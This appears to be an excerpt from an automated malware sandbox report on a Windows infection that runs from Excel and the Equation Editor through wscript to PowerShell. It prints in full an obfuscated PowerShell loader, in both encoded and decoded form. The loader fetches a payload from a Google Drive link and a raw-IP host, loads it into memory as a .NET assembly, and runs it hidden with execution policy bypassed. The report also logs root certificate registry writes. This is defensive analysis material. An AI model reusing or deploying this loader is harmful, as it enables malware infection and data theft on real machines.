                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39) | & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39) | & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560000 push 00000003h; iretd 2_2_03560018
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560179 push es; ret 2_2_0356017A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035602E6 push FFFFFFF6h; iretd 2_2_035602E8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035602EC push esi; retf 2_2_03560307
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00315BB2 push F8B87029h; retf 8_2_00315C8E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00315C72 push F8B87029h; retf 8_2_00315C8E

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356047F URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_0356047F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
